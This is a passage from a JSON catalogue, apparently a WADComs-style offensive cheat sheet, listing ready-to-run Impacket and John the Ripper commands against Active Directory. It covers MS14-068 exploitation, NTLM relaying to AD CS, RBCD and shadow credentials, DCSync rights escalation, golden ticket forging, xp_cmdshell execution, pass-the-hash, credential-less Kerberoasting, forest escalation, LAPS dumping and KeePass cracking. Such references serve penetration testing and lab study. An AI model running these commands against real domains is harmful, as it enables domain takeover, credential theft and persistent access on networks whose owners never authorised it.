   1320     ],
   1321     "services": [
   1322       "LDAP"
   1323     ],
   1324     "references": [
   1325       "https://github.com/fortra/impacket",
   1326       "https://www.thehacker.recipes/ad/movement/dacl/grant-rights",
   1327       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"
   1328     ],
   1329     "added": true
   1330   },
   1331   {
   1332     "id": "wadcoms:Impacket-DescribeTicket",
   1333     "toolId": "wadcoms:Impacket-describeTicket",
   1334     "toolName": "Impacket-describeTicket",
   1335     "name": "Impacket-DescribeTicket",
   1336     "source": "DAEMON",
   1337     "platform": [
   1338       "Linux",
   1339       "ActiveDirectory",
   1340       "Windows"
   1341     ],
   1342     "capability": [
   1343       "Discovery"
   1344     ],
   1345     "nativeCategory": [
   1346       "Discovery"
   1347     ],
   1348     "command": "# Describe a ticket offline (envelope, flags, and the PAC where it can be read)\ndescribeTicket.py out.ccache",
   1349     "description": "Impacket describeTicket.py parses a Kerberos ticket file (ccache or kirbi) and prints its fields, and when given the relevant key it decrypts the enc-part and dumps the PAC, exposing the user, RID, group memberships and PAC signatures. It is the Linux counterpart to Rubeus describe and is useful for validating forged or captured tickets before use. Runs fully offline.\n\nCommand Reference:\n\n\tTicket file: out.ccache",
   1350     "mitre": [],
   1351     "requires": [
   1352       "TGT"
   1353     ],
   1354     "services": [
   1355       "Kerberos"
   1356     ],
   1357     "references": [
   1358       "https://github.com/fortra/impacket",
   1359       "https://www.thehacker.recipes/ad/movement/kerberos/ptt"
   1360     ],
   1361     "added": true
   1362   },
   1363   {
   1364     "id": "wadcoms:Impacket-FindDelegation",
   1365     "toolId": "wadcoms:Impacket-findDelegation",
   1366     "toolName": "Impacket-findDelegation",
   1367     "name": "Impacket-FindDelegation",
   1368     "source": "DAEMON",
   1369     "platform": [
   1370       "Linux",
   1371       "ActiveDirectory",
   1372       "Windows"
   1373     ],
   1374     "capability": [
   1375       "Enumeration",
   1376       "Discovery"
   1377     ],
   1378     "nativeCategory": [
   1379       "Enumeration",
   1380       "Discovery"
   1381     ],
   1382     "command": "# Enumerate all delegation relationships in the domain\nfindDelegation.py test.local/john:password123 -dc-ip 10.10.10.1",
   1383     "description": "Impacket findDelegation.py enumerates every delegation relationship in the domain over LDAP: unconstrained, constrained (S4U2Proxy allowed-to-delegate-to targets) and resource-based constrained delegation. The output identifies accounts and computers that can be abused for privilege escalation and lateral movement via Kerberos delegation. Requires any valid domain credentials.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1",
   1384     "mitre": [],
   1385     "requires": [
   1386       "Username",
   1387       "Password"
   1388     ],
   1389     "services": [
   1390       "Kerberos",
   1391       "LDAP"
   1392     ],
   1393     "references": [
   1394       "https://github.com/fortra/impacket",
   1395       "https://www.thehacker.recipes/ad/movement/kerberos/delegations",
   1396       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation"
   1397     ],
   1398     "added": true
   1399   },
   1400   {
   1401     "id": "wadcoms:Impacket-GetUserSPNs-NoPreauth",
   1402     "toolId": "wadcoms:Impacket-GetUserSPNs",
   1403     "toolName": "Impacket-GetUserSPNs",
   1404     "name": "Impacket-GetUserSPNs-NoPreauth",
   1405     "source": "DAEMON",
   1406     "platform": [
   1407       "Linux",
   1408       "ActiveDirectory",
   1409       "Windows"
   1410     ],
   1411     "capability": [
   1412       "Enumeration",
   1413       "Credential Access"
   1414     ],
   1415     "nativeCategory": [
   1416       "Enumeration",
   1417       "Credential Access"
   1418     ],
   1419     "command": "# 'john' is an account with Kerberos pre-auth disabled; usernames.txt lists SPN accounts to roast\nGetUserSPNs.py -no-preauth john -usersfile usernames.txt -dc-host dc.test.local test.local/",
   1420     "description": "GetUserSPNs.py with -no-preauth performs Kerberoasting without any valid domain credentials. It leverages an account that has Kerberos pre-authentication disabled (an AS-REP roastable account): by altering the sname in a crafted KRB_AS_REQ, the KDC returns a service ticket instead of a TGT, encrypted with the target service account's key. Because you cannot query LDAP for SPNs without creds, you must supply candidate service-account names with -usersfile. The resulting TGS hashes are cracked offline. You only need the name of one pre-auth-disabled account plus a list of accounts to roast.\n\nCommand Reference:\n\n\tNo_Creds (name of an AS-REP roastable account: john)\n\tCandidate accounts file: usernames.txt\n\tDomain: test.local\n\tDomain Controller host: dc.test.local",
   1421     "mitre": [],
   1422     "requires": [
   1423       "No_Creds"
   1424     ],
   1425     "services": [
   1426       "Kerberos",
   1427       "LDAP"
   1428     ],
   1429     "references": [
   1430       "https://github.com/fortra/impacket",
   1431       "https://swarm.ptsecurity.com/kerberoasting-without-spns/",
   1432       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"
   1433     ],
   1434     "added": true
   1435   },
   1436   {
   1437     "id": "wadcoms:Impacket-GoldenPac",
   1438     "toolId": "wadcoms:Impacket-goldenPac",
   1439     "toolName": "Impacket-goldenPac",
   1440     "name": "Impacket-GoldenPac",
   1441     "source": "DAEMON",
   1442     "platform": [
   1443       "Linux",
   1444       "ActiveDirectory",
   1445       "Windows"
   1446     ],
   1447     "capability": [
   1448       "Privilege Escalation",
   1449       "Execution",
   1450       "Lateral Movement"
   1451     ],
   1452     "nativeCategory": [
   1453       "PrivEsc",
   1454       "Exploitation",
   1455       "Lateral Movement"
   1456     ],
   1457     "command": "# Exploit MS14-068 to gain SYSTEM on an unpatched DC\ngoldenPac.py test.local/john:password123@dc.test.local",
   1458     "description": "Impacket goldenPac.py exploits MS14-068 (CVE-2014-6324): on an unpatched domain controller the PAC signature validation can be bypassed, letting an ordinary domain user forge a TGT claiming Domain Admin membership without the krbtgt key. The script builds the forged PAC, obtains a privileged ticket and then executes a command (PSEXEC-style) on the target DC. Only affects DCs missing the 2014 patch, but remains relevant against legacy lab and CTF environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller host: dc.test.local",
   1459     "mitre": [
   1460       "T1558"
   1461     ],
   1462     "requires": [
   1463       "Username",
   1464       "Password"
   1465     ],
   1466     "services": [
   1467       "Kerberos",
   1468       "SMB"
   1469     ],
   1470     "references": [
   1471       "https://github.com/fortra/impacket",
   1472       "https://github.com/fortra/impacket/blob/master/examples/goldenPac.py",
   1473       "https://attack.mitre.org/techniques/T1558/"
   1474     ],
   1475     "added": true
   1476   },
   1477   {
   1478     "id": "wadcoms:Impacket-MSSQLClient",
   1479     "toolId": "wadcoms:Impacket-mssqlclient",
   1480     "toolName": "Impacket-mssqlclient",
   1481     "name": "Impacket-MSSQLClient",
   1482     "source": "DAEMON",
   1483     "platform": [
   1484       "Linux",
   1485       "ActiveDirectory",
   1486       "Windows"
   1487     ],
   1488     "capability": [
   1489       "Lateral Movement",
   1490       "Enumeration"
   1491     ],
   1492     "nativeCategory": [
   1493       "Lateral Movement",
   1494       "Enumeration"
   1495     ],
   1496     "command": "# SQL authentication (mixed-mode / sa account)\nmssqlclient.py test.local/john:password123@10.10.10.1\n\n# Windows (domain) authentication over NTLM\nmssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# Pass-the-hash with Windows auth\nmssqlclient.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 test.local/john@10.10.10.1 -windows-auth",
   1497     "description": "mssqlclient.py from Impacket opens an interactive TDS session against a Microsoft SQL Server. It supports plain SQL logins (the local sa or a mixed-mode account) as well as Windows/domain authentication via -windows-auth, which forces NTLM instead of SQL auth. Pass-the-hash works by supplying -hashes LMHASH:NTHASH instead of a password. Use it as the entry point for all further MSSQL abuse (enumeration, xp_cmdshell, linked servers).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7",
   1498     "mitre": [],
   1499     "requires": [
   1500       "Username",
   1501       "Password"
   1502     ],
   1503     "services": [
   1504       "MSSQL"
   1505     ],
   1506     "references": [
   1507       "https://github.com/fortra/impacket",
   1508       "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server",
   1509       "https://www.thehacker.recipes/ad/movement/mssql"
   1510     ],
   1511     "added": true
   1512   },
   1513   {
   1514     "id": "wadcoms:Impacket-MSSQLClient-XPCmdShell",
   1515     "toolId": "wadcoms:Impacket-mssqlclient",
   1516     "toolName": "Impacket-mssqlclient",
   1517     "name": "Impacket-MSSQLClient-XPCmdShell",
   1518     "source": "DAEMON",
   1519     "platform": [
   1520       "Linux",
   1521       "ActiveDirectory",
   1522       "Windows"
   1523     ],
   1524     "capability": [
   1525       "Execution",
   1526       "Privilege Escalation"
   1527     ],
   1528     "nativeCategory": [
   1529       "Exploitation",
   1530       "PrivEsc"
   1531     ],
   1532     "command": "mssqlclient.py test.local/john:password123@10.10.10.1 -windows-auth\n\n# At the SQL> prompt:\nSQL> enable_xp_cmdshell\nSQL> xp_cmdshell whoami\nSQL> disable_xp_cmdshell",
   1533     "description": "Once connected with mssqlclient.py, the built-in enable_xp_cmdshell command flips the xp_cmdshell advanced option on (via sp_configure), and xp_cmdshell then runs arbitrary OS commands as the SQL Server service account. This requires sysadmin (or equivalent) on the instance. Disable it again with disable_xp_cmdshell to reduce footprint; enabling xp_cmdshell is noisy and commonly alerted on.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123",
   1534     "mitre": [],
   1535     "requires": [
   1536       "Username",
   1537       "Password"
   1538     ],
   1539     "services": [
   1540       "MSSQL"
   1541     ],
   1542     "references": [
   1543       "https://github.com/fortra/impacket",
   1544       "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server",
   1545       "https://www.thehacker.recipes/ad/movement/mssql/execution"
   1546     ],
   1547     "added": true
   1548   },
   1549   {
   1550     "id": "wadcoms:Impacket-NTLMRelayX-AddComputer",
   1551     "toolId": "wadcoms:Impacket-ntlmrelayx",
   1552     "toolName": "Impacket-ntlmrelayx",
   1553     "name": "Impacket-NTLMRelayX-AddComputer",
   1554     "source": "DAEMON",
   1555     "platform": [
   1556       "Linux",
   1557       "Windows",
   1558       "ActiveDirectory"
   1559     ],
   1560     "capability": [
   1561       "Execution",
   1562       "Persistence"
   1563     ],
   1564     "nativeCategory": [
   1565       "Exploitation",
   1566       "Persistence"
   1567     ],
   1568     "command": "# Create a new computer account via the relayed session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --add-computer 'ATTACKER$' 'password123'",
   1569     "description": "Impacket's ntlmrelayx.py relays authentication to LDAPS and, with --add-computer, creates a new attacker-controlled computer account in the directory. This abuses the default MachineAccountQuota of 10, which permits any authenticated domain user to add computer objects. The freshly created account (with a known password) becomes a foothold for follow-on RBCD or Shadow Credentials attacks. If a computername and password are omitted, ntlmrelayx generates a random machine name and password and prints them. LDAPS is required because adding a computer with a password sets attributes that the DC only permits over a signed/sealed channel.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tNew computer account: ATTACKER$\n\n\tPassword: password123",
   1570     "mitre": [],
   1571     "requires": [
   1572       "No_Creds"
   1573     ],
   1574     "services": [
   1575       "NTLM",
   1576       "LDAP"
   1577     ],
   1578     "references": [
   1579       "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py",
   1580       "https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota",
   1581       "https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"
   1582     ],
   1583     "added": true
   1584   },
   1585   {
   1586     "id": "wadcoms:Impacket-NTLMRelayX-DumpLAPS-ADCS",
   1587     "toolId": "wadcoms:Impacket-ntlmrelayx",
   1588     "toolName": "Impacket-ntlmrelayx",
   1589     "name": "Impacket-NTLMRelayX-DumpLAPS-ADCS",
   1590     "source": "DAEMON",
   1591     "platform": [
   1592       "Linux",
   1593       "Windows",
   1594       "ActiveDirectory"
   1595     ],
   1596     "capability": [
   1597       "Discovery",
   1598       "Credential Access",
   1599       "Enumeration"
   1600     ],
   1601     "nativeCategory": [
   1602       "Discovery",
   1603       "Credential Access",
   1604       "Enumeration"
   1605     ],
   1606     "command": "# Dump LAPS passwords and enumerate AD CS via the relayed LDAP session\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --dump-laps --dump-adcs",
   1607     "description": "Impacket's ntlmrelayx.py can leverage a relayed LDAP session for reconnaissance instead of a direct attack. --dump-laps reads and prints any LAPS-managed local administrator passwords (ms-Mcs-AdmPwd) that the relayed identity is permitted to read, and --dump-adcs enumerates AD CS enrollment services and certificate templates to help identify ESC1-ESC8 misconfigurations. Both are low-noise post-relay actions useful for expanding access after coercing a user or computer to authenticate. The amount of data returned depends entirely on the relayed principal's read permissions.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local",
   1608     "mitre": [],
   1609     "requires": [
   1610       "No_Creds"
   1611     ],
   1612     "services": [
   1613       "NTLM",
   1614       "LDAP",
   1615       "ADCS"
   1616     ],
   1617     "references": [
   1618       "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py",
   1619       "https://www.thehacker.recipes/ad/movement/ntlm/relay",
   1620       "https://www.thehacker.recipes/ad/movement/credentials/dumping/laps"
   1621     ],
   1622     "added": true
   1623   },
   1624   {
   1625     "id": "wadcoms:Impacket-NTLMRelayX-ESC8-ADCS",
   1626     "toolId": "wadcoms:Impacket-ntlmrelayx",
   1627     "toolName": "Impacket-ntlmrelayx",
   1628     "name": "Impacket-NTLMRelayX-ESC8-ADCS",
   1629     "source": "DAEMON",
   1630     "platform": [
   1631       "Linux",
   1632       "Windows",
   1633       "ActiveDirectory"
   1634     ],
   1635     "capability": [
   1636       "Privilege Escalation",
   1637       "Credential Access",
   1638       "Execution"
   1639     ],
   1640     "nativeCategory": [
   1641       "PrivEsc",
   1642       "Credential Access",
   1643       "Exploitation"
   1644     ],
   1645     "command": "# Relay coerced DC auth to AD CS web enrollment (ESC8)\npython3 ntlmrelayx.py -t http://ca.test.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController",
   1646     "description": "Impacket's ntlmrelayx.py relays coerced NTLM authentication to the Active Directory Certificate Services (AD CS) web enrollment endpoint (certsrv), abusing ESC8. HTTP enrollment interfaces do not enforce channel binding by default, so a relayed machine or user authentication can request a certificate on behalf of the coerced account. When a Domain Controller's machine account is coerced (via PetitPotam or the printer bug) and relayed against the DomainController template, the resulting certificate authenticates as the DC and enables full domain compromise. The --adcs flag enables the attack and --template selects the certificate template (Machine/DomainController for computers, User for users). ntlmrelayx prints the issued certificate as a base64 PFX for use with PKINIT.\n\nCommand Reference:\n\n\tAD CS enrollment endpoint: http://ca.test.local/certsrv/certfnsh.asp\n\n\tTemplate: DomainController",
   1647     "mitre": [],
   1648     "requires": [
   1649       "No_Creds"
   1650     ],
   1651     "services": [
   1652       "NTLM",
   1653       "ADCS"
   1654     ],
   1655     "references": [
   1656       "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py",
   1657       "https://posts.specterops.io/certified-pre-owned-d95910965cd2",
   1658       "https://www.thehacker.recipes/ad/movement/adcs/relay"
   1659     ],
   1660     "added": true
   1661   },
   1662   {
   1663     "id": "wadcoms:Impacket-NTLMRelayX-EscalateUser",
   1664     "toolId": "wadcoms:Impacket-ntlmrelayx",
   1665     "toolName": "Impacket-ntlmrelayx",
   1666     "name": "Impacket-NTLMRelayX-EscalateUser",
   1667     "source": "DAEMON",
   1668     "platform": [
   1669       "Linux",
   1670       "Windows",
   1671       "ActiveDirectory"
   1672     ],
   1673     "capability": [
   1674       "Privilege Escalation",
   1675       "Execution"
   1676     ],
   1677     "nativeCategory": [
   1678       "PrivEsc",
   1679       "Exploitation"
   1680     ],
   1681     "command": "# Grant existing user 'john' DCSync rights via relayed privileged auth\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --escalate-user john",
   1682     "description": "Impacket's ntlmrelayx.py relays authentication from a privileged victim to LDAP/LDAPS and, with --escalate-user, grants the named existing user the ability to perform a DCSync by writing replication (Replicating Directory Changes) ACEs onto the domain object. This is used when you already control a low-privileged user account and can coerce a privileged principal (for example a Domain Admin session or a DC machine account) to authenticate to your relay. Unlike --add-computer, this modifies an existing account you already own rather than creating a new one, which is useful in environments where MachineAccountQuota is 0.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tUser to escalate: john",
   1683     "mitre": [],
   1684     "requires": [
   1685       "No_Creds"
   1686     ],
   1687     "services": [
   1688       "NTLM",
   1689       "LDAP"
   1690     ],
   1691     "references": [
   1692       "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py",
   1693       "https://www.thehacker.recipes/ad/movement/ntlm/relay",
   1694       "https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"
   1695     ],
   1696     "added": true
   1697   },
   1698   {
   1699     "id": "wadcoms:Impacket-NTLMRelayX-Interactive",
   1700     "toolId": "wadcoms:Impacket-ntlmrelayx",
   1701     "toolName": "Impacket-ntlmrelayx",
   1702     "name": "Impacket-NTLMRelayX-Interactive",
   1703     "source": "DAEMON",
   1704     "platform": [
   1705       "Linux",
   1706       "Windows",
   1707       "ActiveDirectory"
   1708     ],
   1709     "capability": [
   1710       "Lateral Movement",
   1711       "Collection",
   1712       "Execution"
   1713     ],
   1714     "nativeCategory": [
   1715       "Lateral Movement",
   1716       "Collection",
   1717       "Exploitation"
   1718     ],
   1719     "command": "# Relay to SMB and open an interactive client shell\npython3 ntlmrelayx.py -t smb://10.10.10.1 -smb2support -i\n# In another terminal, connect to the spawned session\nnc 127.0.0.1 11000",
   1720     "description": "Impacket's ntlmrelayx.py can hold a relayed SMB session open and expose it as an interactive client rather than running a single command. With -i (--interactive), each successful relay spawns an interactive SMB shell bound to a local TCP port (starting at 11000); connect to it with netcat to browse shares, upload/download files, and read data as the relayed user. This is useful when you want hands-on access to the target's filesystem instead of blind command execution, and pairs with a coercion primitive (PetitPotam, printerbug, dementor) to feed authentications into the relay.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tLocal interactive port: 11000",
   1721     "mitre": [],
   1722     "requires": [
   1723       "No_Creds"
   1724     ],
   1725     "services": [
   1726       "NTLM",
   1727       "SMB"
   1728     ],
   1729     "references": [
   1730       "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py",
   1731       "https://www.thehacker.recipes/ad/movement/ntlm/relay",
   1732       "https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"
   1733     ],
   1734     "added": true
   1735   },
   1736   {
   1737     "id": "wadcoms:Impacket-NTLMRelayX-RBCD",
   1738     "toolId": "wadcoms:Impacket-ntlmrelayx",
   1739     "toolName": "Impacket-ntlmrelayx",
   1740     "name": "Impacket-NTLMRelayX-RBCD",
   1741     "source": "DAEMON",
   1742     "platform": [
   1743       "Linux",
   1744       "Windows",
   1745       "ActiveDirectory"
   1746     ],
   1747     "capability": [
   1748       "Execution",
   1749       "Privilege Escalation"
   1750     ],
   1751     "nativeCategory": [
   1752       "Exploitation",
   1753       "PrivEsc"
   1754     ],
   1755     "command": "# Relay coerced machine auth to LDAPS and configure RBCD on the victim object\n# (auto-creates a computer account to delegate from when you hold MachineAccountQuota)\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --delegate-access",
   1756     "description": "Impacket's ntlmrelayx.py relays coerced NTLM authentication from a victim computer to LDAPS on the Domain Controller. With --delegate-access it writes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the relayed computer object, granting an attacker-controlled account Resource-Based Constrained Delegation (RBCD) over it. After the relay, getST.py can request a Service Ticket impersonating any user (including a Domain Admin) to the victim. This requires an account to delegate to (create one first with --add-computer or Impacket's addcomputer.py) and a coercion primitive such as PetitPotam or the printer bug to force the victim's machine account to authenticate. LDAPS is preferred because RBCD writes require a channel not protected by LDAP signing.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tAttacker computer account: ATTACKER$",
   1757     "mitre": [],
   1758     "requires": [
   1759       "No_Creds"
   1760     ],
   1761     "services": [
   1762       "NTLM",
   1763       "LDAP"
   1764     ],
   1765     "references": [
   1766       "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py",
   1767       "https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/",
   1768       "https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd"
   1769     ],
   1770     "added": true
   1771   },
   1772   {
   1773     "id": "wadcoms:Impacket-NTLMRelayX-ShadowCredentials",
   1774     "toolId": "wadcoms:Impacket-ntlmrelayx",
   1775     "toolName": "Impacket-ntlmrelayx",
   1776     "name": "Impacket-NTLMRelayX-ShadowCredentials",
   1777     "source": "DAEMON",
   1778     "platform": [
   1779       "Linux",
   1780       "Windows",
   1781       "ActiveDirectory"
   1782     ],
   1783     "capability": [
   1784       "Persistence",
   1785       "Credential Access",
   1786       "Execution"
   1787     ],
   1788     "nativeCategory": [
   1789       "Persistence",
   1790       "Credential Access",
   1791       "Exploitation"
   1792     ],
   1793     "command": "# Add a Key Credential to the target account via relayed write access\npython3 ntlmrelayx.py -t ldaps://dc.test.local -smb2support --shadow-credentials --shadow-target 'DC01$'",
   1794     "description": "Impacket's ntlmrelayx.py relays authentication to LDAP/LDAPS and, with --shadow-credentials, performs a Shadow Credentials attack by writing a new Key Credential into the target's msDS-KeyCredentialLink attribute. This adds an attacker-controlled certificate/key pair to the account, allowing later PKINIT authentication to obtain a TGT (and the account's NT hash via UnPAC-the-hash) without changing its password. --shadow-target selects which principal to backdoor; the relayed identity must have write access (GenericWrite/GenericAll) to that object. The attack requires the domain to support Key Trust (a KDC with PKINIT, i.e. an AD CS PKI or Server 2016+). ntlmrelayx saves the generated certificate so you can authenticate with it afterwards using gettgtpkinit.py or PKINITtools.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n\n\tShadow target account: DC01$",
   1795     "mitre": [],
   1796     "requires": [
   1797       "No_Creds"
   1798     ],
   1799     "services": [
   1800       "NTLM",
   1801       "LDAP"
   1802     ],
   1803     "references": [
   1804       "https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py",
   1805       "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab",
   1806       "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"
   1807     ],
   1808     "added": true
   1809   },
   1810   {
   1811     "id": "wadcoms:Impacket-owneredit",
   1812     "toolId": "wadcoms:Impacket-owneredit",
   1813     "toolName": "Impacket-owneredit",
   1814     "name": "Impacket-owneredit",
   1815     "source": "DAEMON",
   1816     "platform": [
   1817       "Linux",
   1818       "ActiveDirectory",
   1819       "Windows"
   1820     ],
   1821     "capability": [
   1822       "Privilege Escalation",
   1823       "Execution",
   1824       "Persistence"
   1825     ],
   1826     "nativeCategory": [
   1827       "PrivEsc",
   1828       "Exploitation",
   1829       "Persistence"
   1830     ],
   1831     "command": "# Set john as the owner of the victim object\nowneredit.py -action 'write' -new-owner 'john' -target 'victim' -dc-ip 10.10.10.1 'test.local/john:password123'",
   1832     "description": "Impacket's owneredit.py reads or changes the owner set in an object's security descriptor over LDAP. Because the owner has implicit WriteDacl, `-action write -new-owner` lets you seize ownership of a target you hold WriteOwner over, then combine it with dacledit.py to grant yourself full control. Use `-action read` first to record the original owner for cleanup. Together owneredit + dacledit reproduce the WriteOwner-to-takeover chain on Linux.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew owner: john\n\n\tTarget object: victim",
   1833     "mitre": [],
   1834     "requires": [
   1835       "Username",
   1836       "Password"
   1837     ],
   1838     "services": [
   1839       "LDAP"
   1840     ],
   1841     "references": [
   1842       "https://github.com/fortra/impacket",
   1843       "https://www.thehacker.recipes/ad/movement/dacl/grant-ownership",
   1844       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"
   1845     ],
   1846     "added": true
   1847   },
   1848   {
   1849     "id": "wadcoms:Impacket-RaiseChild",
   1850     "toolId": "wadcoms:Impacket-raiseChild",
   1851     "toolName": "Impacket-raiseChild",
   1852     "name": "Impacket-RaiseChild",
   1853     "source": "DAEMON",
   1854     "platform": [
   1855       "Linux",
   1856       "ActiveDirectory",
   1857       "Windows"
   1858     ],
   1859     "capability": [
   1860       "Privilege Escalation",
   1861       "Lateral Movement",
   1862       "Execution"
   1863     ],
   1864     "nativeCategory": [
   1865       "PrivEsc",
   1866       "Lateral Movement",
   1867       "Exploitation"
   1868     ],
   1869     "command": "# Escalate from child-domain admin to forest root via ExtraSid golden ticket\nraiseChild.py test.local/john:password123",
   1870     "description": "Impacket raiseChild.py automates child-domain-to-forest-root privilege escalation by abusing the intra-forest trust. Given Domain Admin credentials in a child domain it DCSyncs the child krbtgt, forges a golden ticket with an Enterprise Admins ExtraSid from the forest root, and uses it to compromise the parent, optionally executing a command on the root DC. Requires child-domain administrative credentials.\n\nCommand Reference:\n\n\tChild domain: test.local\n\n\tUsername: john\n\n\tPassword: password123",
   1871     "mitre": [],
   1872     "requires": [
   1873       "Username",
   1874       "Password"
   1875     ],
   1876     "services": [
   1877       "Kerberos"
   1878     ],
   1879     "references": [
   1880       "https://github.com/fortra/impacket",
   1881       "https://www.thehacker.recipes/ad/movement/domain-trusts/child-parent",
   1882       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection"
   1883     ],
   1884     "added": true
   1885   },
   1886   {
   1887     "id": "wadcoms:Impacket-TicketConverter",
   1888     "toolId": "wadcoms:Impacket-ticketConverter",
   1889     "toolName": "Impacket-ticketConverter",
   1890     "name": "Impacket-TicketConverter",
   1891     "source": "DAEMON",
   1892     "platform": [
   1893       "Linux",
   1894       "ActiveDirectory",
   1895       "Windows"
   1896     ],
   1897     "capability": [
   1898       "Collection",
   1899       "Defense Evasion"
   1900     ],
   1901     "nativeCategory": [
   1902       "Collection",
   1903       "Defense Evasion"
   1904     ],
   1905     "command": "# kirbi -> ccache (for Impacket)\nticketConverter.py ticket.kirbi out.ccache\n\n# ccache -> kirbi (for Rubeus/Mimikatz)\nticketConverter.py out.ccache ticket.kirbi",
   1906     "description": "Impacket ticketConverter.py converts between the .kirbi format (used by Mimikatz and Rubeus) and the .ccache format (used by Impacket and MIT Kerberos), in either direction, based on the input file extension. This bridges Windows and Linux tooling: dump a TGT with Rubeus, convert it, and reuse it from an Impacket workflow (or vice versa). It performs no network activity.\n\nCommand Reference:\n\n\tInput ticket: ticket.kirbi\n\n\tOutput ticket: out.ccache",
   1907     "mitre": [],
   1908     "requires": [
   1909       "TGT"
   1910     ],
   1911     "services": [
   1912       "Kerberos"
   1913     ],
   1914     "references": [
   1915       "https://github.com/fortra/impacket",
   1916       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket",
   1917       "https://www.thehacker.recipes/ad/movement/kerberos/ptt"
   1918     ],
   1919     "added": true
   1920   },
   1921   {
   1922     "id": "wadcoms:Impacket-Ticketer-AES",
   1923     "toolId": "wadcoms:Impacket-ticketer",
   1924     "toolName": "Impacket-ticketer",
   1925     "name": "Impacket-Ticketer-AES",
   1926     "source": "DAEMON",
   1927     "platform": [
   1928       "Linux",
   1929       "ActiveDirectory",
   1930       "Windows"
   1931     ],
   1932     "capability": [
   1933       "Persistence",
   1934       "Execution"
   1935     ],
   1936     "nativeCategory": [
   1937       "Persistence",
   1938       "Exploitation"
   1939     ],
   1940     "command": "# Forge an AES golden ticket -> administrator.ccache\nticketer.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92 -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local administrator\n\n# Use it\nexport KRB5CCNAME=administrator.ccache",
   1941     "description": "Impacket ticketer.py forges golden (or silver) tickets offline; supplying -aesKey signs the ticket with the krbtgt AES256 key instead of the RC4/NT hash, producing an AES-encrypted TGT that blends in with modern Kerberos traffic. The resulting .ccache can be exported to KRB5CCNAME and used by any Impacket tool for pass-the-ticket. Requires the krbtgt AES key and the domain SID.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tDomain: test.local\n\n\tTarget user: administrator",
   1942     "mitre": [
   1943       "T1558.001"
   1944     ],
   1945     "requires": [
   1946       "AES_Key"
   1947     ],
   1948     "services": [
   1949       "Kerberos"
   1950     ],
   1951     "references": [
   1952       "https://github.com/fortra/impacket",
   1953       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket",
   1954       "https://attack.mitre.org/techniques/T1558/001/"
   1955     ],
   1956     "added": true
   1957   },
   1958   {
   1959     "id": "wadcoms:John-keepass2john",
   1960     "toolId": "wadcoms:John",
   1961     "toolName": "John",
   1962     "name": "John-keepass2john",
   1963     "source": "DAEMON",
   1964     "platform": [
   1965       "Linux"
   1966     ],
   1967     "capability": [
   1968       "Credential Access"
   1969     ],
   1970     "nativeCategory": [
   1971       "Credential Access"
   1972     ],
   1973     "command": "# extract the master-key hash from the .kdbx\nkeepass2john Database.kdbx > hashes.txt\n\n# crack the master password\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt",
